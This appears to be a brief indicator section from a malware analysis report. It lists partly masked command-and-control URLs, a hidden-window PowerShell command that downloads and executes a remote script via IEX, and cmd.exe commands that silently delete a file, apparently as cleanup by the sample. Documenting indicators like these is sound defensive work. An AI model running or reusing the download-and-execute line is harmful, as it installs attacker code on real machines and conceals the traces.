Technical Information
- http://19#.##.163.48:80/update
- http://19#.#4.163.48/update
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://19#.##.163.48:80/update'))" (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c del /q /a "<Full path to file>" (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c del /q /a "<Full path to file>"